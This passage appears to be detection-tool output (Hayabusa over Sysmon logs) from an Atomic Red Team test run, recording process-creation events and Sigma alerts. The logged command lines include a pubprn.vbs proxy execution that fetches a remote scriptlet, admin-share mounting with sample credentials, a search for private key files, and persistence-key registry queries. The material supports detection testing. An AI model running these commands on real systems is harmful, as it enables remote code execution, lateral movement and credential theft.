747F3D96-D83F-5D31-0000-0010A2E72E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:31.134 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D83F-5D31-0000-001001EC2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:31.157 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /resume AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D83F-5D31-0000-001053EE2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:31.240 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4888 | PGUID: 747F3D96-D83F-5D31-0000-00105EF22E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:36.834 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D844-5D31-0000-001075082F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:36.882 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | LID: 0x50951 | PID: 
2484 | PGUID: 747F3D96-D844-5D31-0000-0010C70A2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:36.882 +00:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:37.264 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D845-5D31-0000-001098212F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.050 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2096 | PGUID: 747F3D96-D849-5D31-0000-0010914D2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.050 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.085 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ 
P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 3284 | PGUID: 747F3D96-D849-5D31-0000-0010E54F2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.085 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.109 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D849-5D31-0000-00103C522F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.109 +00:00,MSEDGEWIN10,1,medium,LatMov,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.109 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:46.238 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1628 | PGUID: 
747F3D96-D84E-5D31-0000-00102C702F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.466 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6524 | PGUID: 747F3D96-D859-5D31-0000-0010E68C2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.466 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.524 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-D859-5D31-0000-0010FB8F2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.524 +00:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation_sysmon/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.524 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.557 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D859-5D31-0000-001045922F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.557 +00:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation_sysmon/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.557 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.570 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .key | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D859-5D31-0000-00109E932F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.570 +00:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation_sysmon/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:31.690 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3188 | PGUID: 
747F3D96-D87B-5D31-0000-0010D92D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.150 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2888 | PGUID: 747F3D96-D87C-5D31-0000-0010E83B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.180 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D87C-5D31-0000-0010413E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.180 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.227 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5984 | PGUID: 
747F3D96-D87C-5D31-0000-00107A403100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.249 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 5256 | PGUID: 747F3D96-D87C-5D31-0000-0010CC423100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.249 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.304 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D87C-5D31-0000-001009453100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.335 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 6208 | PGUID: 
747F3D96-D87C-5D31-0000-00105B473100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.335 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.389 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D87C-5D31-0000-001097493100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.413 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D87C-5D31-0000-0010E94B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.413 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.463 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | 
Parent Cmd: powershell | LID: 0x50951 | PID: 1428 | PGUID: 747F3D96-D87C-5D31-0000-0010264E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.497 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D87C-5D31-0000-001078503100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.497 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.551 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D87C-5D31-0000-0010B4523100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.585 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | LID: 0x50951 | PID: 5024 | PGUID: 
747F3D96-D87C-5D31-0000-001006553100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.585 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.660 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D87C-5D31-0000-00103F573100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.678 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | LID: 0x50951 | PID: 4360 | PGUID: 747F3D96-D87C-5D31-0000-001080593100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.678 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.728 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 956 | PGUID: 747F3D96-D87C-5D31-0000-0010CA5B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.743 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D87C-5D31-0000-00101D5E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.743 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.789 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6832 | PGUID: 747F3D96-D87C-5D31-0000-001056603100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.807 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | 
PID: 6436 | PGUID: 747F3D96-D87C-5D31-0000-0010A8623100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.807 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.850 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5936 | PGUID: 747F3D96-D87C-5D31-0000-0010E1643100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.868 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D87C-5D31-0000-001033673100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.868 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.921 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | 
